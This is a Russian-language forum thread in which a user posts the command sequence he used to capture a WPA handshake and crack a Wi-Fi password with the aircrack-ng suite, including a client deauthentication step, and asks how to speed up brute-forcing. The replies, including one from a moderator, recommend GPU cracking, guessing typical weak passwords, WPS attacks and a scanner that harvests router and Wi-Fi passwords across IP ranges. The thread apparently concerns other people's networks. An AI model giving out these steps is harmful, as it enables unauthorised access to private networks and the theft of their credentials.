kali linux несколько вопрсов

Уязвимости, взломы и способы защиты. Вирусы здесь не обсуждаются

Модераторы: Tim308, phantom

Ответить
ninzzo
Новичок

Сообщение ninzzo »

Здравствуйте!

Установил kali linux.

Забрал пароль от wi-fi по инструкции:
1. Взлом путем перехвата HandShake:
---узнаем имя нашей карты wifi---
ifconfig wlan
---переводим ее в режим мониторинга---
airmon-ng start wlan0
---сканируем доступные wifi сети (что-бы остановить нажмите ctrl+c)---
airodump-ng mon0
---запускаем сканирование интересующей сети и сохраняем пакеты (ждем рукопожатия)---
airodump-ng mon0 --channel x --bssid xx:xx:xx:xx:xx:xx -w /root/Desktop/WPA
---отключаем клиента от интересующей нас сети что-бы получить handshake---
aireplay-ng -0 1 -a xx:xx:xx:xx:xx:xx -c xx:xx:xx:xx:xx:xx mon0
Запускаю
aircrack-ng -w /(словарь который входит в дистрибутив по умолчанию) -b xx:xx:xx:xx:xx:xx /root/Desktop/WPA*.cap

Примерное время ожидание 12 часов!!! А на второй пароль больше суток.

1. Это нормально что такое время ? Можно ли как то ускорить перебор пароля ?

По официальному мануалу попробовал поставить nvidia драйвер. Слетела вообще вся графическая система и нельзя вернуь как было. Буду переустанавливать kali linux с нуля опять

2. Реально ли ускориться перебор паролей если я установлю nvidia? Во сколько раз ? У меня geforce 810m видюха

3. Установлен с kali linux браузер(icewe....) по умолчанию нереально тормозит. Прокрутка страницы вниз-вверх тормозит. Когда идет отбновление в терминале - торзмозит браузер и вся система. Работает как то отвратительно все после виндовс, в котором все летает. Запускается только с acpi=off. При выключении или перезагрузке виснет и нужно кнопкой вырубать. Почему все так плохо(по сравнению с виндой)? Или нужно ставить дополнительные драйвера и тогда все будет нормально? Если установить фаерфокс(оперу) то они не будут так глючить ? (спрашиваю у опытных,т.к. сам не в теме)

спасибо всем кто ответит на эти 3 вопроса.

RimeMasters
Новичок

Сообщение RimeMasters »

Да нормальное, время напрямую зависит от мощности вашего компьютера.
Видео карта у вас слабая она думаю большого прироста не даст, но можно попробовать установите aircrack-ng-cuda, она будет вычислять на мощности вашей видеокарты.
Вам требуется установить драйвера, скорее всего по этому всё тормозит.

Tim308
Модератор
Модератор

Сообщение Tim308 »

ninzzo, Хендшейки получай под кали, а перебирай на видеокарте под виндой.
Зачем вообще кали ставить, если ее можно юзать с флешки.

phantom
Модератор
Модератор

Сообщение phantom »

ninzzo писал(а): Здравствуйте!

Установил kali linux.

Забрал пароль от wi-fi по инструкции:
1. Взлом путем перехвата HandShake:
---узнаем имя нашей карты wifi---
ifconfig wlan
---переводим ее в режим мониторинга---
airmon-ng start wlan0
---сканируем доступные wifi сети (что-бы остановить нажмите ctrl+c)---
airodump-ng mon0
---запускаем сканирование интересующей сети и сохраняем пакеты (ждем рукопожатия)---
airodump-ng mon0 --channel x --bssid xx:xx:xx:xx:xx:xx -w /root/Desktop/WPA
---отключаем клиента от интересующей нас сети что-бы получить handshake---
aireplay-ng -0 1 -a xx:xx:xx:xx:xx:xx -c xx:xx:xx:xx:xx:xx mon0
Запускаю
aircrack-ng -w /(словарь который входит в дистрибутив по умолчанию) -b xx:xx:xx:xx:xx:xx /root/Desktop/WPA*.cap

Примерное время ожидание 12 часов!!! А на второй пароль больше суток.

1. Это нормально что такое время ? Можно ли как то ускорить перебор пароля ?

По официальному мануалу попробовал поставить nvidia драйвер. Слетела вообще вся графическая система и нельзя вернуь как было. Буду переустанавливать kali linux с нуля опять

2. Реально ли ускориться перебор паролей если я установлю nvidia? Во сколько раз ? У меня geforce 810m видюха

3. Установлен с kali linux браузер(icewe....) по умолчанию нереально тормозит. Прокрутка страницы вниз-вверх тормозит. Когда идет отбновление в терминале - торзмозит браузер и вся система. Работает как то отвратительно все после виндовс, в котором все летает. Запускается только с acpi=off. При выключении или перезагрузке виснет и нужно кнопкой вырубать. Почему все так плохо(по сравнению с виндой)? Или нужно ставить дополнительные драйвера и тогда все будет нормально? Если установить фаерфокс(оперу) то они не будут так глючить ? (спрашиваю у опытных,т.к. сам не в теме)

спасибо всем кто ответит на эти 3 вопроса.
Как я упомянул в другой ветке, значительно ускорить перебор паролей может перемешивание слов в пассворд листе. если они идут по очереди. для этого есть программки под винду. под линукс не встречал. Но тот стандартный пассворд лист. включенный в кали как правило в россии не действует. если на роутере стандартный заводской пароль, то его взлом по словарю как правило бесполезен. така как он состоит из всех символов и цифр плюс регистр. в этом случае поможет только WPS. если же юзер сменил пароль то как показывает практикапрактика. пароли типичные и отчасти глупые. то номер телефона. то номер машины.то что-то вроде lena1234 или вообще дата рождения. ни разу в практике не встречал случаев где люди ставят сложные пароли. а вообще есть чудесная программка от Стаса, -routerscan
юзайте на здоровье, она бесплатная и по заданному диапазону айпишников ищет все роутеры и вэб страницы авторизации. показывает их пароли, данные и пароли от вафли. есть даже карта взломанных точек доступа по всей россии.

Thr0TT1e
Новичок

Сообщение Thr0TT1e »

А как сделать, что бы система при загрузки с cd сразу на русском загружалась, а то при смене языка из настроек системы она тупо виснет или графическая оболочка падает?!

Попробовал прописать lang=ru_RU.UTF-8 или lang=ru_RU в - /grub/loopback.cfg , но не получилось.

SveT
Новичок

Сообщение SveT »

http://psyhocode.com/%D0%BA%D0%B0%D0%BA ... %BD%D0%B8/

Отправлено спустя 2 минуты 20 секунд:
после этого все настройки сохраняются. в том числе и язык интерфейса

Ответить

Вернуться в «Информационная безопасность»